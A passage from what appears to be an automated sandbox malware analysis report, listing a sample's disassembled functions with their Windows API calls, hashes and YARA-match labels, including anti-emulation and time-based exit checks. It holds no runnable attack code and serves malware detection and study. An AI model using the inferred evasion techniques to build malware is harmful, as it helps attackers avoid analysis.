                                                      • API String ID: 2460923012-0
                                                      • Opcode ID: ee9227776e1a163bb843850bd3aff5afec6ce4158c572e0447e518cfd2a5e4b6
                                                      • Instruction ID: 0ec55a965af9ee4ed0ddd2cc2376fe8e6412ffbedcbc38102cfc6ae5fd0f7729
                                                      • Opcode Fuzzy Hash: ee9227776e1a163bb843850bd3aff5afec6ce4158c572e0447e518cfd2a5e4b6
                                                      • Instruction Fuzzy Hash: D131B672A00218EFCB14DBA4DC84EFAF77AFB88714F245519F90693250DB74E945DBA0
                                                      Function 02C96357 Relevance: 9.2, APIs: 6, Instructions: 212COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • std::_Xinvalid_argument.LIBCPMT ref: 02C963A1
                                                      • std::_Xinvalid_argument.LIBCPMT ref: 02C963C0
                                                      • memmove.MSVCRT(FFFFFFFF,00000000,00000000,?,?,00000000), ref: 02C9641B
                                                      • memcpy.MSVCRT(00000010,?,?), ref: 02C9643F
                                                      • memcpy.MSVCRT(00000000,?,?), ref: 02C96454
                                                      • std::_Xinvalid_argument.LIBCPMT ref: 02C96547
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.2250158335.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_2c70000_ED60.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Xinvalid_argumentstd::_$memcpy$memmove
                                                      • String ID:
                                                      • API String ID: 1795094292-0
                                                      • Opcode ID: 2a4a5d3ddbce30f325ddc875da91afdb60403017f99ea862b9c1950d341a9fb0
                                                      • Instruction ID: dfea0ef18d16ec6191308e04d2fa7192cf006507ae00256be9a61158125698a0
                                                      • Opcode Fuzzy Hash: 2a4a5d3ddbce30f325ddc875da91afdb60403017f99ea862b9c1950d341a9fb0
                                                      • Instruction Fuzzy Hash: ED617E70B00204DBDF28CF98C9D896EB3BAEB85704B744959E596877C9D730EE81CB94
                                                      Function 02C8DC07 Relevance: 9.1, APIs: 6, Instructions: 127registrystringCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • memset.MSVCRT ref: 02C8DC2D
                                                      • RegOpenKeyExA.ADVAPI32(80000001,00638CD8,00000000,00020119,?), ref: 02C8DC4C
                                                      • RegQueryValueExA.ADVAPI32(?,006388D4,00000000,00000000,00000000,000000FF), ref: 02C8DC70
                                                      • RegCloseKey.ADVAPI32(?), ref: 02C8DC7A
                                                      • lstrcat.KERNEL32(?,00000000), ref: 02C8DC9F
                                                      • lstrcat.KERNEL32(?,00638968), ref: 02C8DCB3
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.2250158335.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_2c70000_ED60.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: lstrcat$CloseOpenQueryValuememset
                                                      • String ID:
                                                      • API String ID: 2623679115-0
                                                      • Opcode ID: b23d715e84088277fc7ecb37460dcd51035e03f7a7eff3f09cee9e62073f6cb7
                                                      • Instruction ID: 03be0fb18deb4ade07018df51d15b2901f38b3762a50456ad109c7b1fec34c1c
                                                      • Opcode Fuzzy Hash: b23d715e84088277fc7ecb37460dcd51035e03f7a7eff3f09cee9e62073f6cb7
                                                      • Instruction Fuzzy Hash: 5B413DB5A0024DAFDB54EB64DC85FDD77BAAF54304F0080A4B90997290EE70AA89DFD1
                                                      Function 02C79ED7 Relevance: 9.1, APIs: 4, Strings: 2, Instructions: 123memorystringCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • lstrcpy.KERNEL32(00000000), ref: 02C79F0F
                                                      • LocalAlloc.KERNEL32(00000040,?), ref: 02C79F41
                                                      • StrStrA.SHLWAPI(00000000,00434C28), ref: 02C79F6A
                                                      • memcmp.MSVCRT(?,0042D67C,00000005), ref: 02C79FA3
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.2250158335.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_2c70000_ED60.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: AllocLocallstrcpymemcmp
                                                      • String ID: $<LC
                                                      • API String ID: 4154055062-3067866279
                                                      • Opcode ID: 593bdc4e3889a0863eabcc69851fa3e713a3accde6d95eb3f4ec782924c56939
                                                      • Instruction ID: c6333c6f3bafed483d54cb32d9b0f3365aa2cf6b2a52508f9d18c264714822bb
                                                      • Opcode Fuzzy Hash: 593bdc4e3889a0863eabcc69851fa3e713a3accde6d95eb3f4ec782924c56939
                                                      • Instruction Fuzzy Hash: 00410771A006499BDB10EF75CC81EAE77BAEF94308F048164ED05A7350EB31EE45CB91
                                                      Function 02C8EE27 Relevance: 9.1, APIs: 6, Instructions: 110stringCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 02C8EE6B
                                                      • lstrcpy.KERNEL32(00000000,?), ref: 02C8EE9A
                                                      • lstrcat.KERNEL32(?,00000000), ref: 02C8EEA8
                                                      • lstrcat.KERNEL32(?,0043179C), ref: 02C8EEC1
                                                      • lstrcat.KERNEL32(?,00638DF8), ref: 02C8EED4
                                                      • lstrcat.KERNEL32(?,0043179C), ref: 02C8EEE6
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.2250158335.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_2c70000_ED60.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: lstrcat$FolderPathlstrcpy
                                                      • String ID:
                                                      • API String ID: 818526691-0
                                                      • Opcode ID: 62f342ca06f7d37881aa09e81d0f367079dd2d600ff3d5062891332eee8e8ade
                                                      • Instruction ID: a65899488f3762bbcd835722e726a0601079e845a1c1039898b094986fa9fafb
                                                      • Opcode Fuzzy Hash: 62f342ca06f7d37881aa09e81d0f367079dd2d600ff3d5062891332eee8e8ade
                                                      • Instruction Fuzzy Hash: 004163B5A00159AFDB14EB64DC41FED77B6EF58304F0084A8BA1997290DB709E84DFA1
                                                      Function 00409A80 Relevance: 9.1, APIs: 6, Instructions: 67filememoryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,?,?,?,?,?,0040140E), ref: 00409A9A
                                                      • GetFileSizeEx.KERNEL32(00000000,?,?,?,?,0040140E), ref: 00409AB0
                                                      • LocalAlloc.KERNEL32(00000040,?,?,?,?,0040140E), ref: 00409AC7
                                                      • ReadFile.KERNEL32(00000000,00000000,?,0040140E,00000000,?,?,?,0040140E), ref: 00409AE0
                                                      • LocalFree.KERNEL32(?,?,?,?,0040140E), ref: 00409B00
                                                      • CloseHandle.KERNEL32(00000000,?,?,?,0040140E), ref: 00409B07
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.2248899859.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000001.00000002.2248899859.000000000048E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000001.00000002.2248899859.0000000000496000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000001.00000002.2248899859.00000000004AF000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000001.00000002.2248899859.0000000000638000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000001.00000002.2248899859.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_400000_ED60.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: File$Local$AllocCloseCreateFreeHandleReadSize
                                                      • String ID:
                                                      • API String ID: 2311089104-0
                                                      • Opcode ID: 8c3de4b5f7d7000f0aa90acc772a5ffcb979225bf9b87a846b24b1fb6ecb3daa
                                                      • Instruction ID: e07bc1cf37077e01f74a08ddf4965744106ae1532c602a75826c3d4cb70f4bb0
                                                      • Opcode Fuzzy Hash: 8c3de4b5f7d7000f0aa90acc772a5ffcb979225bf9b87a846b24b1fb6ecb3daa
                                                      • Instruction Fuzzy Hash: 97115E71600209AFE710DFA9DDC8AAB737DFB44350F10016AF901A72C1EB74AD50CBA4
                                                      Function 02C79CE7 Relevance: 9.1, APIs: 6, Instructions: 67filememoryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,?,?,?,?,?,02C71675), ref: 02C79D01
                                                      • GetFileSizeEx.KERNEL32(00000000,?,?,?,?,02C71675), ref: 02C79D17
                                                      • LocalAlloc.KERNEL32(00000040,?,?,?,?,02C71675), ref: 02C79D2E
                                                      • ReadFile.KERNEL32(00000000,00000000,?,02C71675,00000000,?,?,?,02C71675), ref: 02C79D47
                                                      • LocalFree.KERNEL32(?,?,?,?,02C71675), ref: 02C79D67
                                                      • CloseHandle.KERNEL32(00000000,?,?,?,02C71675), ref: 02C79D6E
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.2250158335.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_2c70000_ED60.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: File$Local$AllocCloseCreateFreeHandleReadSize
                                                      • String ID:
                                                      • API String ID: 2311089104-0
                                                      • Opcode ID: 18fe08c416d9db512f6576e54d93a0197b66446ba9587125c2374a8c0eafa297
                                                      • Instruction ID: b3259257ea588dfc1e54b9d5067a4ab2086ef5a4ce405e16d205728493c00ace
                                                      • Opcode Fuzzy Hash: 18fe08c416d9db512f6576e54d93a0197b66446ba9587125c2374a8c0eafa297
                                                      • Instruction Fuzzy Hash: B9116DB1600209AFEB20DFA8DC88FBA736EEB54744F104219F91597280DB70EE50CBA0
                                                      Function 02C936B7 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 97COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • GetLogicalProcessorInformationEx.KERNELBASE(0000FFFF,00000000,?), ref: 02C93701
                                                      • GetLastError.KERNEL32 ref: 02C9370B
                                                        • Part of subcall function 02C94207: GetProcessHeap.KERNEL32(00000000,?,02C777DF), ref: 02C9420E
                                                        • Part of subcall function 02C94207: HeapFree.KERNEL32(00000000), ref: 02C94215
                                                      • wsprintfA.USER32 ref: 02C937A6
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.2250158335.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_2c70000_ED60.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Heap$ErrorFreeInformationLastLogicalProcessProcessorwsprintf
                                                      • String ID: LC$LC
                                                      • API String ID: 879827129-528129335
                                                      • Opcode ID: ce6de5d1e877e4f0fd987ebff9d1ffd40b63e83997d25823aa4dd601067c1184
                                                      • Instruction ID: 6f90cb26ed263b9adab1cdb6b2ebfa428087f43c3ad366d5b52ef0c3dc172455
                                                      • Opcode Fuzzy Hash: ce6de5d1e877e4f0fd987ebff9d1ffd40b63e83997d25823aa4dd601067c1184
                                                      • Instruction Fuzzy Hash: C231BEB1E006598BCF24CF99DA44BAEF7B9FB84B15F10016AE805E3340D7359A01CBD5
                                                      Function 00408980 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 93COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • std::_Xinvalid_argument.LIBCPMT ref: 00408996
                                                        • Part of subcall function 0042A3D0: std::exception::exception.LIBCMT ref: 0042A3E5
                                                        • Part of subcall function 0042A3D0: __CxxThrowException@8.LIBCMT ref: 0042A3FA
                                                      • std::_Xinvalid_argument.LIBCPMT ref: 004089CD
                                                        • Part of subcall function 0042A383: std::exception::exception.LIBCMT ref: 0042A398
                                                        • Part of subcall function 0042A383: __CxxThrowException@8.LIBCMT ref: 0042A3AD
                                                      • memcpy.MSVCRT(?,00000000,?,00000000,?,?,004087D0,?,00000000,00407897), ref: 00408A2B
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.2248899859.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000001.00000002.2248899859.000000000048E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000001.00000002.2248899859.0000000000496000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000001.00000002.2248899859.00000000004AF000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000001.00000002.2248899859.0000000000638000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000001.00000002.2248899859.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_400000_ED60.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Exception@8ThrowXinvalid_argumentstd::_std::exception::exception$memcpy
                                                      • String ID: invalid string position$string too long
                                                      • API String ID: 2202983795-4289949731
                                                      • Opcode ID: be1e48ae44eb35c08a53ce7425593eb67a9c5aa3ab9b03645f4bdfba31e8aa39
                                                      • Instruction ID: 668d70cf3dd627df833c2d1df51655412700ca9114fd28f549cd6b0e14ccab25
                                                      • Opcode Fuzzy Hash: be1e48ae44eb35c08a53ce7425593eb67a9c5aa3ab9b03645f4bdfba31e8aa39
                                                      • Instruction Fuzzy Hash: 6421F8723006108BC720EA5DE940A6AF7A9DBA1760B10093FF5D1DB7C1CA79D841C7ED
                                                      Function 02C93047 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 46memorytimeCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • GetProcessHeap.KERNEL32(00000000,00000104,00000000,00000000,?), ref: 02C93079
                                                      • RtlAllocateHeap.NTDLL(00000000), ref: 02C93080
                                                      • GetTimeZoneInformation.KERNEL32(?), ref: 02C9308F
                                                      • wsprintfA.USER32 ref: 02C930BA
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.2250158335.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_2c70000_ED60.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Heap$AllocateInformationProcessTimeZonewsprintf
                                                      • String ID: wwww
                                                      • API String ID: 3317088062-671953474
                                                      • Opcode ID: 90b710c9931f944b22adb0b58dfc5f5fa46652bc0e070347157d94c4ec96aef4
                                                      • Instruction ID: 0588618cc122e36b5a7aa76371387ed361e9ffa1c2a9b298a53cb6c6f6bd6cb5
                                                      • Opcode Fuzzy Hash: 90b710c9931f944b22adb0b58dfc5f5fa46652bc0e070347157d94c4ec96aef4
                                                      • Instruction Fuzzy Hash: 1801F771A04604ABCB1C9B58DC4AF6AB76AE784720F10436AF916D72C0D7B459008AE5
                                                      Function 02C78FB7 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 26COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • ??2@YAPAXI@Z.MSVCRT(?,02C78ED2,00000000,?,?,00000000), ref: 02C78FC9
                                                      • std::exception::exception.LIBCMT ref: 02C78FE4
                                                      • __CxxThrowException@8.LIBCMT ref: 02C78FF9
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.2250158335.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_2c70000_ED60.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: ??2@Exception@8Throwstd::exception::exception
                                                      • String ID: $KC$$KC
                                                      • API String ID: 3448701045-807291510
                                                      • Opcode ID: 51656279e56368e7ce8787016bc7534fb037c8a5d6e2363c95d7d4a48b92e3ae
                                                      • Instruction ID: 8f5896c34097476033b9b8969fe54d6d1a44ceb51d2d64e607199761f5970868
                                                      • Opcode Fuzzy Hash: 51656279e56368e7ce8787016bc7534fb037c8a5d6e2363c95d7d4a48b92e3ae
                                                      • Instruction Fuzzy Hash: FEE02BB090010996CB14EBA48C097BFB3B8BF40304F00036DDA1192580EB71D204D699
                                                      Function 02C9983F Relevance: 7.6, APIs: 5, Instructions: 93COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.2250158335.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_2c70000_ED60.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: CodeInfoPageValidmemset
                                                      • String ID:
                                                      • API String ID: 703783727-0
                                                      • Opcode ID: b43d601b7e2105c586d7e644edcbb48dcaae7d12bd5490e3f5c989b3b4c26550
                                                      • Instruction ID: 8d242257d463bcfb6170e7994db2892341a237961addaf0d72e4447ebb11e9ab
                                                      • Opcode Fuzzy Hash: b43d601b7e2105c586d7e644edcbb48dcaae7d12bd5490e3f5c989b3b4c26550
                                                      • Instruction Fuzzy Hash: 3A314C70A042818FEF268F36C88C379BF909F82305F0945AED88ACF192C339C505C791
                                                      Function 00421CF0 Relevance: 7.6, APIs: 5, Instructions: 66timeCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • GetSystemTime.KERNEL32(?,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,?,00422070), ref: 00421D42
                                                        • Part of subcall function 004219F0: lstrcpy.KERNEL32(00000000,0042CFF4), ref: 00421A1F
                                                        • Part of subcall function 004219F0: lstrlenA.KERNEL32(02D65E50,00000000,00000000,?,?,00421D51), ref: 00421A30
                                                        • Part of subcall function 004219F0: lstrcpy.KERNEL32(00000000,00000000), ref: 00421A57
                                                        • Part of subcall function 004219F0: lstrcatA.KERNEL32(00000000,00000000), ref: 00421A62
                                                        • Part of subcall function 004219F0: lstrcpy.KERNEL32(00000000,00000000), ref: 00421A91
                                                        • Part of subcall function 004219F0: lstrlenA.KERNEL32(00434FA8,?,?,00421D51), ref: 00421AA3
                                                        • Part of subcall function 004219F0: lstrcpy.KERNEL32(00000000,00000000), ref: 00421AC4
                                                        • Part of subcall function 004219F0: lstrcatA.KERNEL32(00000000,00434FA8,?,?,00421D51), ref: 00421AD0
                                                        • Part of subcall function 004219F0: lstrcpy.KERNEL32(00000000,00000000), ref: 00421AFF
                                                      • sscanf.NTDLL ref: 00421D6A
                                                      • SystemTimeToFileTime.KERNEL32(?,?), ref: 00421D86
                                                      • SystemTimeToFileTime.KERNEL32(?,?), ref: 00421D96
                                                      • ExitProcess.KERNEL32 ref: 00421DB3
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.2248899859.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000001.00000002.2248899859.000000000048E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000001.00000002.2248899859.0000000000496000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000001.00000002.2248899859.00000000004AF000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000001.00000002.2248899859.0000000000638000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000001.00000002.2248899859.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_400000_ED60.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Timelstrcpy$System$Filelstrcatlstrlen$ExitProcesssscanf
                                                      • String ID:
                                                      • API String ID: 3040284667-0
                                                      • Opcode ID: 70fb3db3e554c7d51a6d87790ab4f5262d78885ef9ced18a5adf94f503b7bf3d
                                                      • Instruction ID: 04f8fd08741a0fc09d6cb508f0bafc9493e7b9cab1cb2a0045bc539cadffe094
                                                      • Opcode Fuzzy Hash: 70fb3db3e554c7d51a6d87790ab4f5262d78885ef9ced18a5adf94f503b7bf3d
                                                      • Instruction Fuzzy Hash: 332102B1518301AF8344DF69D88499BBBF9EED8304F409A1EF599C3220E774E6048FA6
                                                      Function 02C91F57 Relevance: 7.6, APIs: 5, Instructions: 66timeCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • GetSystemTime.KERNEL32(?), ref: 02C91FA9
                                                        • Part of subcall function 02C91C57: lstrcpy.KERNEL32(00000000,0042CFF4), ref: 02C91C86
                                                        • Part of subcall function 02C91C57: lstrlen.KERNEL32(00638DEC), ref: 02C91C97
                                                        • Part of subcall function 02C91C57: lstrcpy.KERNEL32(00000000,00000000), ref: 02C91CBE
                                                        • Part of subcall function 02C91C57: lstrcat.KERNEL32(00000000,00000000), ref: 02C91CC9
                                                        • Part of subcall function 02C91C57: lstrcpy.KERNEL32(00000000,00000000), ref: 02C91CF8
                                                        • Part of subcall function 02C91C57: lstrlen.KERNEL32(00434FA8), ref: 02C91D0A
                                                        • Part of subcall function 02C91C57: lstrcpy.KERNEL32(00000000,00000000), ref: 02C91D2B
                                                        • Part of subcall function 02C91C57: lstrcat.KERNEL32(00000000,00434FA8), ref: 02C91D37
                                                        • Part of subcall function 02C91C57: lstrcpy.KERNEL32(00000000,00000000), ref: 02C91D66
                                                      • sscanf.NTDLL ref: 02C91FD1
                                                      • SystemTimeToFileTime.KERNEL32(?,?), ref: 02C91FED
                                                      • SystemTimeToFileTime.KERNEL32(?,?), ref: 02C91FFD
                                                      • ExitProcess.KERNEL32 ref: 02C9201A
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.2250158335.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_2c70000_ED60.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Timelstrcpy$System$Filelstrcatlstrlen$ExitProcesssscanf
                                                      • String ID:
                                                      • API String ID: 3040284667-0
                                                      • Opcode ID: d3585bb41137a9862eec331790d52422d97d6d4fde1bfc123c1fde79e799ec0a
                                                      • Instruction ID: 0b8f2e842b2ae211644ed56093c7604d36c3a5fe272e32ccb975a49ea20c42a5
                                                      • Opcode Fuzzy Hash: d3585bb41137a9862eec331790d52422d97d6d4fde1bfc123c1fde79e799ec0a
                                                      • Instruction Fuzzy Hash: A721DFB1508301AF8754DF69D88595BBBF9EFD8214F40AA1EF599C3220E770D6048FA6
                                                      Function 02C71297 Relevance: 7.6, APIs: 5, Instructions: 55memoryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 02C712AD
                                                      • VirtualAllocExNuma.KERNEL32(00000000), ref: 02C712B4
                                                      • ExitProcess.KERNEL32 ref: 02C712BF
                                                      • VirtualAlloc.KERNEL32(00000000,17C841C0,00003000,00000004), ref: 02C712D3
                                                      • VirtualFree.KERNEL32(00000000,17C841C0,00008000), ref: 02C71312
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.2250158335.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_2c70000_ED60.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Virtual$AllocProcess$CurrentExitFreeNuma
                                                      • String ID:
                                                      • API String ID: 3477276466-0
                                                      • Opcode ID: eebbf2a7d8a8f00017b338c7aa3164428bececb1a666839850d6e3d3436eabea
                                                      • Instruction ID: ba2f0fdf3bd779b0d115f24cb180a61995891ccfb17e2258ea8cab6dd152ac03
                                                      • Opcode Fuzzy Hash: eebbf2a7d8a8f00017b338c7aa3164428bececb1a666839850d6e3d3436eabea
                                                      • Instruction Fuzzy Hash: 7901F4717403047BEB144AA56C1EF6B77EEA785B15F309019F708E7280DAB1EA008AB8
                                                      Function 00406EF0 Relevance: 7.6, APIs: 4, Strings: 1, Instructions: 50memoryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • memcpy.MSVCRT(?,?,00000040), ref: 00406F00
                                                      • memcpy.MSVCRT(?,00005A4D,000000F8), ref: 00406F3C
                                                      • GetProcessHeap.KERNEL32(00000008,?), ref: 00406F74
                                                      • HeapAlloc.KERNEL32(00000000), ref: 00406F7B
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.2248899859.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000001.00000002.2248899859.000000000048E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000001.00000002.2248899859.0000000000496000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000001.00000002.2248899859.00000000004AF000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000001.00000002.2248899859.0000000000638000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000001.00000002.2248899859.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_400000_ED60.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Heapmemcpy$AllocProcess
                                                      • String ID: @
                                                      • API String ID: 1643994569-2766056989
                                                      • Opcode ID: 9d0aa672cad1b422e85df3b0c0ffa8adf9295387143c5de3d490c1a63fad8456
                                                      • Instruction ID: e1db0f0f00307df363e64ad8a88bb248863c5a506cdc1b59983cb41b111b7395
                                                      • Opcode Fuzzy Hash: 9d0aa672cad1b422e85df3b0c0ffa8adf9295387143c5de3d490c1a63fad8456
                                                      • Instruction Fuzzy Hash: 92118E70600602CBDB258F60DD84BBB73A4EB40704F054839F946DB6C4FBB8E955CB68
                                                      Function 02C71387 Relevance: 7.5, APIs: 5, Instructions: 37registrymemoryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • GetProcessHeap.KERNEL32(00000000,00000104), ref: 02C7139C
                                                      • RtlAllocateHeap.NTDLL(00000000), ref: 02C713A3
                                                      • RegOpenKeyExA.ADVAPI32(80000001,0043175C,00000000,00020119,?), ref: 02C713C0
                                                      • RegQueryValueExA.ADVAPI32(?,00431750,00000000,00000000,00000000,000000FF), ref: 02C713DA
                                                      • RegCloseKey.ADVAPI32(?), ref: 02C713E4
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.2250158335.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_2c70000_ED60.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                                      • String ID:
                                                      • API String ID: 3225020163-0
                                                      • Opcode ID: 3eabf35694fb7367b255f32a536ab17974b5ca8c4e5d7cae6c54b1374e0763a8
                                                      • Instruction ID: 85d0b46f3a5246e082a517c28eda18ecd5f2bef013126fe0b377bd095e7eeae6
                                                      • Opcode Fuzzy Hash: 3eabf35694fb7367b255f32a536ab17974b5ca8c4e5d7cae6c54b1374e0763a8
                                                      • Instruction Fuzzy Hash: 9CF01D75A40308BFD7149BA09C89FEB7B7DEB04755F101159FE09E6291D7B05A448BE0
                                                      Function 02C99448 Relevance: 7.5, APIs: 5, Instructions: 34COMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                      • __getptd.LIBCMT ref: 02C99454
                                                        • Part of subcall function 02C98C76: __getptd_noexit.LIBCMT ref: 02C98C79
                                                        • Part of subcall function 02C98C76: __amsg_exit.LIBCMT ref: 02C98C86
                                                      • __getptd.LIBCMT ref: 02C9946B
                                                      • __amsg_exit.LIBCMT ref: 02C99479
                                                      • __lock.LIBCMT ref: 02C99489
                                                      • __updatetlocinfoEx_nolock.LIBCMT ref: 02C9949D
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.2250158335.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_2c70000_ED60.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: __amsg_exit__getptd$Ex_nolock__getptd_noexit__lock__updatetlocinfo
                                                      • String ID:
                                                      • API String ID: 938513278-0
                                                      • Opcode ID: e7b9cb3ff97e9fe8530363059c1b568236a6dbbc01e08edc4d6d2640a621f97e
                                                      • Instruction ID: 807883d9c8e490e45ded0b6dd425a28263cd69722ae6e12226d9f9f2b11357fd
                                                      • Opcode Fuzzy Hash: e7b9cb3ff97e9fe8530363059c1b568236a6dbbc01e08edc4d6d2640a621f97e
                                                      • Instruction Fuzzy Hash: 7DF0E9B3906B009BEF22BBBC980DB5D73A2AF41B20F14424DE449A72D0DF345A00EF59
                                                      Function 00417D60 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 124COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • std::_Xinvalid_argument.LIBCPMT ref: 00417DD4
                                                      • std::_Xinvalid_argument.LIBCPMT ref: 00417DEF
